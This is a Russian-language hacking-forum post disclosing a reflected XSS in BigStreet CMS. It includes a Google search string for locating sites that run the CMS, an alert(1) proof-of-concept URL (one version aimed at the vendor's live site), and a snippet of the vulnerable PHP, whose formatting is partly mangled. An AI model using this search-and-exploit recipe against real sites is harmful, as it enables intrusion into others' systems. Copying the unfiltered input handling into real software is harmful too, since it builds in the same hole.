Энциклопедия уязвимых скриптов

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

16.07.2010, 13:47

emillord

Участник форума

Регистрация: 20.01.2008

Сообщений: 284

Провел на форуме:
3767223

Репутация: 408

Отправить сообщение для emillord с помощью ICQ

BigStreet alpha RC1

(07.10.2010)

BigStreet CMS — система для создания сообществ.

Искать в гугле по запросу

Код:

Code:
Powered by BigStreet

XSS

Передаём в GET

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site/system/tools/yaca.parser.php?url=1alert(1).[/COLOR][/COLOR]

Сайт автора:

Цитата:

Сообщение от None

http://www.bigstreet.ru/system/tools/yaca.parser.php?url=1%3Cscript%3Ealert%281%29%3C/script%3E.

Недостаточная фильтрация входящих данных.

PHP код:


		
			
PHP:
[COLOR="#000000"][/COLOR]" style="width: 500px">

    $text = file_get_contents($first_url);

    $text = iconv('windows-1251', 'utf-8', $text);

    preg_match_all("/\d+/isU", $text, $matches);

    $text = file_get_contents($url);

    $text = iconv('windows-1251', 'utf-8', $text);

    preg_match_all("/([\d\w\.\-]*)/isU", $text, $matches);

[/COLOR]